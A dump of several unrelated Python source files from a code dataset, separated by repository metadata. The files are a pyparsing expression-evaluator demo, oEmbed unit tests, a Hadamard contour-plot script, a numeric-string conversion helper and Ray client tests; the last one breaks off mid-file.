(expop, 2, opAssoc.LEFT, EvalPowerOp),
(multop, 2, opAssoc.LEFT, EvalMultOp),
(plusop, 2, opAssoc.LEFT, EvalAddOp),
])
comparisonop = oneOf("< <= > >= != = <> LT GT LE GE EQ NE")
comp_expr = operatorPrecedence(arith_expr,
[
(comparisonop, 2, opAssoc.LEFT, EvalComparisonOp),
])
def main():
# sample expressions posted on comp.lang.python, asking for advice
# in safely evaluating them
rules=[
'( A - B ) = 0',
'(A + B + C + D + E + F + G + H + I) = J',
'(A + B + C + D + E + F + G + H) = I',
'(A + B + C + D + E + F) = G',
'(A + B + C + D + E) = (F + G + H + I + J)',
'(A + B + C + D + E) = (F + G + H + I)',
'(A + B + C + D + E) = F',
'(A + B + C + D) = (E + F + G + H)',
'(A + B + C) = (D + E + F)',
'(A + B) = (C + D + E + F)',
'(A + B) = (C + D)',
'(A + B) = (C - D + E - F - G + H + I + J)',
'(A + B) = C',
'(A + B) = 0',
'(A+B+C+D+E) = (F+G+H+I+J)',
'(A+B+C+D) = (E+F+G+H)',
'(A+B+C+D)=(E+F+G+H)',
'(A+B+C)=(D+E+F)',
'(A+B)=(C+D)',
'(A+B)=C',
'(A-B)=C',
'(A/(B+C))',
'(B/(C+D))',
'(G + H) = I',
'-0.99 LE ((A+B+C)-(D+E+F+G)) LE 0.99',
'-0.99 LE (A-(B+C)) LE 0.99',
'-1000.00 LE A LE 0.00',
'-5000.00 LE A LE 0.00',
'A < B',
'A < 7000',
'A = -(B)',
'A = C',
'A = 0',
'A GT 0',
'A GT 0.00',
'A GT 7.00',
'A LE B',
'A LT -1000.00',
'A LT -5000',
'A LT 0',
'A=(B+C+D)',
'A=B',
'I = (G + H)',
'0.00 LE A LE 4.00',
'4.00 LT A LE 7.00',
'0.00 LE A LE 4.00 LE E > D',
'2**2**(A+3)',
]
vars_={'A': 0, 'B': 1.1, 'C': 2.2, 'D': 3.3, 'E': 4.4, 'F': 5.5, 'G':
6.6, 'H':7.7, 'I':8.8, 'J':9.9}
# define tests from given rules
tests = []
for t in rules:
t_orig = t
t = t.replace("=","==")
t = t.replace("EQ","==")
t = t.replace("LE","<=")
t = t.replace("GT",">")
t = t.replace("LT","<")
t = t.replace("GE",">=")
t = t.replace("LE","<=")
t = t.replace("NE","!=")
t = t.replace("<>","!=")
tests.append( (t_orig,eval(t,vars_)) )
# copy vars_ to EvalConstant lookup dict
EvalConstant.vars_ = vars_
failed = 0
for test,expected in tests:
ret = comp_expr.parseString(test)[0]
parsedvalue = ret.eval()
print(test, expected, parsedvalue, end=' ')
if parsedvalue != expected:
print("<<< FAIL")
failed += 1
else:
print()
print()
if failed:
print(failed, "tests FAILED")
else:
print("all tests PASSED")
if __name__=='__main__':
main()
| 31.157895
| 75
| 0.442286
|
4a04d91b06e56946d56460911ddd1e7c62a31fe4
| 4,181
|
py
|
Python
|
tests/test_oembed.py
|
kgaughan/adjunct
|
b4e845d3b9c0648e6ac46ee25e484e9660f3924e
|
[
"MIT"
] | null | null | null |
tests/test_oembed.py
|
kgaughan/adjunct
|
b4e845d3b9c0648e6ac46ee25e484e9660f3924e
|
[
"MIT"
] | 1
|
2019-02-23T14:41:35.000Z
|
2020-06-15T13:00:46.000Z
|
tests/test_oembed.py
|
kgaughan/adjunct
|
b4e845d3b9c0648e6ac46ee25e484e9660f3924e
|
[
"MIT"
] | null | null | null |
from http import client
import io
import json
import unittest
from unittest import mock
from adjunct.fixtureutils import FakeSocket, make_fake_http_response
from adjunct.oembed import (
_build_url,
fetch_oembed_document,
find_first_oembed_link,
parse_xml_oembed_response,
)
class BuildUrlTest(unittest.TestCase):
def test_base(self):
self.assertEqual(_build_url("foo", None, None), "foo")
def test_dimension(self):
self.assertEqual(_build_url("foo", 5, None), "foo&maxwidth=5")
self.assertEqual(_build_url("foo", None, 8), "foo&maxheight=8")
self.assertEqual(_build_url("foo", 5, 8), "foo&maxwidth=5&maxheight=8")
class OEmbedFinderTest(unittest.TestCase):
links_without = [
{"href": "https://www.example.com/style.css", "rel": "stylesheet"},
{"href": "https://www.example.com/", "rel": "canonical"},
{"href": "https://m.example.com/", "media": "handheld", "rel": "alternate"},
{"href": "https://cdn.example.com/favicon.png", "rel": "icon"},
]
def test_none(self):
self.assertIsNone(find_first_oembed_link(self.links_without))
def test_find(self):
links = self.links_without + [
{
"href": "http://www.example.com/oembed?format=json",
"rel": "alternate",
"title": "JSON Example",
"type": "application/json+oembed",
},
{
"href": "http://www.example.com/oembed?format=xml",
"rel": "alternate",
"title": "XML Example",
"type": "text/xml+oembed",
},
]
result = find_first_oembed_link(links)
self.assertEqual(result, "http://www.example.com/oembed?format=json")
def test_no_href(self):
links = self.links_without + [
{
"rel": "alternate",
"title": "JSON Example",
"type": "application/json+oembed",
},
{
"href": "http://www.example.com/oembed?format=xml",
"rel": "alternate",
"title": "XML Example",
"type": "text/xml+oembed",
},
]
result = find_first_oembed_link(links)
self.assertEqual(result, "http://www.example.com/oembed?format=xml")
class OEmbedXMLParserTest(unittest.TestCase):
def test_parse(self):
fh = io.StringIO(
"""<?xml version="1.0" encoding="utf-8"?>
<oembed>
<version>1.0</version>
<type>photo</type>
<title>This is a title</title>
<url>http://example.com/foo.png</url>
<height>300</height>
<width>300</width>
</oembed>
"""
)
fields = parse_xml_oembed_response(fh)
self.assertDictEqual(
fields,
{
"version": "1.0",
"type": "photo",
"title": "This is a title",
"width": "300",
"height": "300",
},
)
def make_response(dct, content_type="application/json+oembed; charset=UTF-8"):
return make_fake_http_response(
body=json.dumps(dct), headers={"Content-Type": content_type}
)
class FetchTest(unittest.TestCase):
@mock.patch("urllib.request.urlopen")
def test_fetch(self, mock_urlopen):
orig = {
"version": "1.0",
"type": "video",
"html": "<video/>",
"width": 480,
"height": 270,
"author_name": "John Doe",
"title": "A video",
}
mock_urlopen.return_value = make_response(orig)
fetched = fetch_oembed_document("https://example.com/oembed?type=json")
mock_urlopen.assert_called_once()
self.assertIsInstance(fetched, dict)
self.assertDictEqual(fetched, orig)
@mock.patch("urllib.request.urlopen")
def test_fetch_bad(self, mock_urlopen):
mock_urlopen.return_value = make_response({}, content_type="text/plain")
fetched = fetch_oembed_document("https://example.com/oembed?type=json")
mock_urlopen.assert_called_once()
self.assertIsNone(fetched)
| 31.674242
| 84
| 0.566372
|
4a04da5f2d812a742b1816e73b2e299c829d08ff
| 2,884
|
py
|
Python
|
pystatreduce/doc/plot/plot_hadamard/plot_2DHadamard_contour.py
|
OptimalDesignLab/pyStatReduce
|
9ea128409b91dd582e574e2e1cc153572b6c60a4
|
[
"MIT"
] | null | null | null |
pystatreduce/doc/plot/plot_hadamard/plot_2DHadamard_contour.py
|
OptimalDesignLab/pyStatReduce
|
9ea128409b91dd582e574e2e1cc153572b6c60a4
|
[
"MIT"
] | null | null | null |
pystatreduce/doc/plot/plot_hadamard/plot_2DHadamard_contour.py
|
OptimalDesignLab/pyStatReduce
|
9ea128409b91dd582e574e2e1cc153572b6c60a4
|
[
"MIT"
] | null | null | null |
# Plot the contours of a 2D Hadamard Quadratic. This figure has 3 subplots,
# which describe the effect of different eigenvalue decay rates on the contours
# of the Hadamard quadratic
import os
import sys
import errno
sys.path.insert(0, '../../src')
import numpy as np
from mpl_toolkits import mplot3d
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import chaospy as cp
from stochastic_collocation import StochasticCollocation
from quantity_of_interest import QuantityOfInterest
from dimension_reduction import DimensionReduction
from stochastic_arnoldi.arnoldi_sample import ArnoldiSampling
import examples
systemsize = 2
decay_rate_arr = np.array([2,1,0.5])
QoI1 = examples.HadamardQuadratic(systemsize, decay_rate_arr[0])
QoI2 = examples.HadamardQuadratic(systemsize, decay_rate_arr[1])
QoI3 = examples.HadamardQuadratic(systemsize, decay_rate_arr[2])
nx = 100
xlow = -2*np.ones(systemsize)
xupp = 2*np.ones(systemsize)
x1 = np.linspace(xlow[0], xupp[0], num=nx)
x2 = np.linspace(xlow[1], xupp[1], num=nx)
J_xi1 = np.zeros([nx,nx])
J_xi2 = np.zeros([nx,nx])
J_xi3 = np.zeros([nx,nx])
pert = np.zeros(systemsize)
for i in xrange(0, nx):
for j in xrange(0, nx):
x = np.array([x1[i], x2[j]])
J_xi1[j,i] = QoI1.eval_QoI(x, pert)
J_xi2[j,i] = QoI2.eval_QoI(x, pert)
J_xi3[j,i] = QoI3.eval_QoI(x, pert)
# Plot
plt.rc('text', usetex=True)
matplotlib.rcParams['mathtext.fontset'] = 'cm'
props = dict(boxstyle='round', facecolor='white')
fname = "./pdfs/hadamard_contours.pdf"
f, axes = plt.subplots(1,3, sharey=True , figsize=(10,4))
plt.setp(axes, yticks=[-2,-1,0,1,2])
cp1 = axes[0].contour(x1, x2, J_xi1, cmap="coolwarm", linewidths=0.5)
# axes[0].clabel(cp, inline=1, fmt='%1.1f', fontsize=8)
axes[0].set_xlabel(r'$\xi_1$', fontsize=16)
axes[0].set_ylabel(r'$\xi_2$', fontsize=16)
axes[0].text(0.5,1,r'$\lambda_i = \frac{1}{i^2}$', size=18, bbox=props, \
transform=axes[0].transAxes, horizontalalignment='center', \
verticalalignment='center')
cp2 = axes[1].contour(x1, x2, J_xi2, cmap="coolwarm", linewidths=0.5)
# axes[1].clabel(cp, inline=1, fmt='%1.1f', fontsize=8)
axes[1].set_xlabel(r'$\xi_1$', fontsize=16)
axes[1].set_ylabel(r'$\xi_2$', fontsize=16)
axes[1].text(0.5,1,r'$\lambda_i = \frac{1}{i}$', size=18, bbox=props, \
transform=axes[1].transAxes, horizontalalignment='center', \
verticalalignment='center')
cp3 = axes[2].contour(x1, x2, J_xi3, cmap="coolwarm", linewidths=0.5)
# axes[2].clabel(cp, inline=1, fmt='%1.1f', fontsize=8)
axes[2].set_xlabel(r'$\xi_1$', fontsize=16)
axes[2].set_ylabel(r'$\xi_2$', fontsize=16)
axes[2].text(0.5,1,r'$\lambda_i = \frac{1}{\sqrt{i}}$', size=18, bbox=props, \
transform=axes[2].transAxes, horizontalalignment='center', \
verticalalignment='center')
f.savefig(fname, format='pdf')
| 36.506329
| 79
| 0.690707
|
4a04dad1a93a517dc1c0d49b0ef375f11430bc80
| 407
|
py
|
Python
|
tests/test_world.py
|
Will-Holden/cascadv2
|
fd43d47d4be075d30e75053f9af3cd82c33b6623
|
[
"Apache-2.0"
] | null | null | null |
tests/test_world.py
|
Will-Holden/cascadv2
|
fd43d47d4be075d30e75053f9af3cd82c33b6623
|
[
"Apache-2.0"
] | null | null | null |
tests/test_world.py
|
Will-Holden/cascadv2
|
fd43d47d4be075d30e75053f9af3cd82c33b6623
|
[
"Apache-2.0"
] | 1
|
2022-03-24T10:01:28.000Z
|
2022-03-24T10:01:28.000Z
|
import sys
import os
sys.path.append('..')
sys.path.append('.')
import unittest
from cascad.experiment.token_sender import ERC20TokenWorld
class TestAgent(unittest.TestCase):
def test_token_world(self):
erc20_token_world = ERC20TokenWorld(0.5, 10, 10)
print(erc20_token_world.next_id())
erc20_token_world.run()
if __name__ == '__main__':
unittest.main()
pass
| 22.611111
| 58
| 0.697789
|
4a04db344a155c70cb7857af7896426dc02f7f38
| 1,440
|
py
|
Python
|
db_format_helpers/strings_in_fields_to_numbers.py
|
ThorsteinnAdal/webcrawls_in_singapore_shippinglane
|
6f6073c58648407c495931678adb1d584e9105df
|
[
"Apache-2.0"
] | null | null | null |
db_format_helpers/strings_in_fields_to_numbers.py
|
ThorsteinnAdal/webcrawls_in_singapore_shippinglane
|
6f6073c58648407c495931678adb1d584e9105df
|
[
"Apache-2.0"
] | null | null | null |
db_format_helpers/strings_in_fields_to_numbers.py
|
ThorsteinnAdal/webcrawls_in_singapore_shippinglane
|
6f6073c58648407c495931678adb1d584e9105df
|
[
"Apache-2.0"
] | null | null | null |
__author__ = 'thorsteinn'
from is_number import is_number
from is_int import is_int
def strings_in_fields_to_numbers(db_key, db):
"""
A method for converting typed numbers to actual numbers
u'123.22' should be turned into a floating point number
u'123' should be turned into an integer number
:param db_key: specifies individual key that should be processed. If left blank, all fields in the db are processed
:param db: a db that is processed
:return: the script changes the db that is passed to it
"""
ships = db.keys()
for ship in ships:
ship_db = db[ship]
if type(db_key) is list:
fields = db_key
else:
if db_key:
fields = [db_key]
if db_key.lower() == 'all' or db_key is None:
fields = ship_db.keys()
else:
raise KeyError('{this_key} is not recognized as a valid key.'.format(this_key=db_key))
for field in fields:
if field in ship_db.keys() and ship_db[field] and is_number(ship_db[field]):
val = str(ship_db[field])
if val.upper() != 'INFINITY':
if ',' in val:
val = str(ship_db[field]).replace(',', '')
if '.' in val:
ship_db[field] = float(val)
else:
ship_db[field] = int(val)
| 37.894737
| 119
| 0.555556
|
4a04db5c1a40b7c834d271b650c5a9f7e0dc8007
| 24,247
|
py
|
Python
|
python/ray/tests/test_client.py
|
jamesliu/ray
|
11ab412db1fa3603a3006e8ed414e80dd1f11c0c
|
[
"Apache-2.0"
] | 33
|
2020-05-27T14:25:24.000Z
|
2022-03-22T06:11:30.000Z
|
python/ray/tests/test_client.py
|
jamesliu/ray
|
11ab412db1fa3603a3006e8ed414e80dd1f11c0c
|
[
"Apache-2.0"
] | 227
|
2021-10-01T08:00:01.000Z
|
2021-12-28T16:47:26.000Z
|
python/ray/tests/test_client.py
|
gramhagen/ray
|
c18caa4db36d466718bdbcb2229aa0b2dc03da1f
|
[
"Apache-2.0"
] | 5
|
2020-08-06T15:53:07.000Z
|
2022-02-09T03:31:31.000Z
|
import os
import pytest
import time
import sys
import logging
import queue
import threading
import _thread
from unittest.mock import patch
import ray.util.client.server.server as ray_client_server
from ray.tests.client_test_utils import create_remote_signal_actor
from ray.tests.client_test_utils import run_wrapped_actor_creation
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import connect_to_client_or_not
from ray.util.client.ray_client_helpers import ray_start_client_server
from ray._private.client_mode_hook import client_mode_should_convert
from ray._private.client_mode_hook import disable_client_hook
from ray._private.client_mode_hook import enable_client_mode
from ray._private.test_utils import run_string_as_driver
@pytest.mark.parametrize("connect_to_client", [False, True])
def test_client_context_manager(ray_start_regular_shared, connect_to_client):
import ray
with connect_to_client_or_not(connect_to_client):
if connect_to_client:
# Client mode is on.
assert client_mode_should_convert(auto_init=True)
# We're connected to Ray client.
assert ray.util.client.ray.is_connected()
else:
assert not client_mode_should_convert(auto_init=True)
assert not ray.util.client.ray.is_connected()
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_client_thread_safe(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
return "ok"
class Blocker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.daemon = True
def run(self):
ray.get(block.remote())
b = Blocker()
b.start()
time.sleep(1)
# Can concurrently execute the get.
assert ray.get(fast.remote(), timeout=5) == "ok"
# @pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
# @pytest.mark.skip()
def test_client_mode_hook_thread_safe(ray_start_regular_shared):
with ray_start_client_server():
with enable_client_mode():
assert client_mode_should_convert(auto_init=True)
lock = threading.Lock()
lock.acquire()
q = queue.Queue()
def disable():
with disable_client_hook():
q.put(client_mode_should_convert(auto_init=True))
lock.acquire()
q.put(client_mode_should_convert(auto_init=True))
t = threading.Thread(target=disable)
t.start()
assert client_mode_should_convert(auto_init=True)
lock.release()
t.join()
assert q.get(
) is False, "Threaded disable_client_hook failed to disable"
assert q.get(
) is True, "Threaded disable_client_hook failed to re-enable"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_interrupt_ray_get(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
time.sleep(1)
return "ok"
class Interrupt(threading.Thread):
def run(self):
time.sleep(2)
_thread.interrupt_main()
it = Interrupt()
it.start()
with pytest.raises(KeyboardInterrupt):
ray.get(block.remote())
# Assert we can still get new items after the interrupt.
assert ray.get(fast.remote()) == "ok"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_get_list(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def f():
return "OK"
assert ray.get([]) == []
assert ray.get([f.remote()]) == ["OK"]
get_count = 0
get_stub = ray.worker.server.GetObject
# ray.get() uses unary-unary RPC. Mock the server handler to count
# the number of requests received.
def get(req, metadata=None):
nonlocal get_count
get_count += 1
return get_stub(req, metadata=metadata)
ray.worker.server.GetObject = get
refs = [f.remote() for _ in range(100)]
assert ray.get(refs) == ["OK" for _ in range(100)]
# Only 1 RPC should be sent.
assert get_count == 1
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
# Make sure ray.put(1) == 1 is False and does not raise an exception.
objectref = ray.put(1)
assert not objectref == 1
# Make sure it returns True when necessary as well.
assert objectref == ClientObjectRef(objectref.id)
# Assert output is correct type.
list_put = ray.put([1, 2, 3])
assert isinstance(list_put, ClientObjectRef)
assert ray.get(list_put) == [1, 2, 3]
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_put_failure_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
class DeSerializationFailure:
def __getstate__(self):
return ""
def __setstate__(self, i):
raise ZeroDivisionError
dsf = DeSerializationFailure()
with pytest.raises(ZeroDivisionError):
ray.put(dsf)
# Ensure Ray Client is still connected
assert ray.get(ray.put(100)) == 100
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or \
(ready, remaining) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) \
or (ready_retval, remaining_retval) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef(b"blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
SignalActor = create_remote_signal_actor(ray)
signaler = SignalActor.remote()
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
# Timeout 0 on ray.wait leads to immediate return
# (not indefinite wait for first return as with timeout None):
unready_ref = signaler.wait.remote()
res = ray.wait([unready_ref], timeout=0)
# Not ready.
assert res[0] == [] and len(res[1]) == 1
ray.get(signaler.send.remote())
ready_ref = signaler.wait.remote()
# Ready.
res = ray.wait([ready_ref], timeout=10)
assert len(res[0]) == 1 and res[1] == []
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return "Hello " + whom, self.count
@ray.method(num_returns=2)
def say_hi(self, whom):
self.count += 1
return "Hi " + whom, self.count
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
ref = actor.say_hello.remote("world")
s, count = ray.get(ref)
assert s == "Hello world"
assert count == 2
r1, r2 = actor.say_hi.remote("ray")
assert ray.get(r1) == "Hi ray"
assert ray.get(r2) == 3
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact,
10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(actor_handle.exec_exec.remote(second_actor, fact,
9)) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj,
4)) == local_fact(4)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
# Allow some time to propogate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2, logs_with_id
assert any(
(msg.find("get") >= 0 for msg in logs_with_id)), logs_with_id
assert any(
(msg.find("put") >= 0 for msg in logs_with_id)), logs_with_id
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
num_hello = 0
for msg in log_msgs:
if "Hello world" in msg:
num_hello += 1
assert num_hello == 2, f"Invalid logs: {log_msgs}"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_serializing_exceptions(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(
ValueError, match="Failed to look up actor with name 'abc'"):
ray.get_actor("abc")
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_invalid_task(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote(runtime_env="invalid value")
def f():
return 1
# No exception on making the remote call.
ref = f.remote()
# Exception during scheduling will be raised on ray.get()
with pytest.raises(Exception):
ray.get(ref)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor.
"""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
@ray.method(num_returns=2)
def half(self):
return self.x / 2, self.x / 2
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(
name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
detatched_actor = ray.get_actor("test_acc2")
for i in range(5):
detatched_actor.inc.remote()
assert ray.get(detatched_actor.get.remote()) == 6
h1, h2 = ray.get(detatched_actor.half.remote())
assert h1 == 3
assert h2 == 3
def test_error_serialization(ray_start_regular_shared):
"""Test that errors will be serialized properly."""
fake_path = os.path.join(os.path.dirname(__file__), "not_a_real_file")
with pytest.raises(FileNotFoundError):
with ray_start_client_server() as ray:
@ray.remote
def g():
with open(fake_path, "r") as f:
f.read()
# Raises a FileNotFoundError
ray.get(g.remote())
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") == b""
def test_startup_retry(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
with pytest.raises(ConnectionError):
ray_client.connect("localhost:50051", connection_retries=1)
def run_client():
ray_client.connect("localhost:50051")
ray_client.disconnect()
thread = threading.Thread(target=run_client, daemon=True)
thread.start()
time.sleep(3)
server = ray_client_server.serve("localhost:50051")
thread.join()
server.stop(0)
ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
@ray_client.remote
def f(x):
time.sleep(4)
return x
def stop_server(server):
time.sleep(2)
server.stop(0)
server = ray_client_server.serve("localhost:50051")
ray_client.connect("localhost:50051")
thread = threading.Thread(target=stop_server, args=(server, ))
thread.start()
x = f.remote(2)
with pytest.raises(ConnectionError):
_ = ray_client.get(x)
thread.join()
ray_client.disconnect()
ray_client._inside_client_test = False
# Wait for f(x) to finish before ray.shutdown() in the fixture
time.sleep(3)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@patch.dict(os.environ, {"RAY_ENABLE_AUTO_CONNECT": "0"})
def test_client_gpu_ids(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with enable_client_mode():
# No client connection.
with pytest.raises(Exception) as e:
ray.get_gpu_ids()
assert str(e.value) == "Ray Client is not connected."\
" Please connect by calling `ray.init`."
with ray_start_client_server():
# Now have a client connection.
assert ray.get_gpu_ids() == []
def test_client_serialize_addon(call_ray_stop_only):
import ray
import pydantic
ray.init(num_cpus=0)
class User(pydantic.BaseModel):
name: str
with ray_start_client_server() as ray:
assert ray.get(ray.put(User(name="ray"))).name == "ray"
object_ref_cleanup_script = """
import ray
ray.init("ray://localhost:50051")
@ray.remote
def f():
return 42
@ray.remote
class SomeClass:
pass
obj_ref = f.remote()
actor_ref = SomeClass.remote()
"""
def test_object_ref_cleanup():
# Checks no error output when running the script in
# object_ref_cleanup_script
# See https://github.com/ray-project/ray/issues/17968 for details
with ray_start_client_server():
result = run_string_as_driver(object_ref_cleanup_script)
assert "Error in sys.excepthook:" not in result
assert "AttributeError: 'NoneType' object has no " not in result
assert "Exception ignored in" not in result
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@pytest.mark.parametrize(
"call_ray_start",
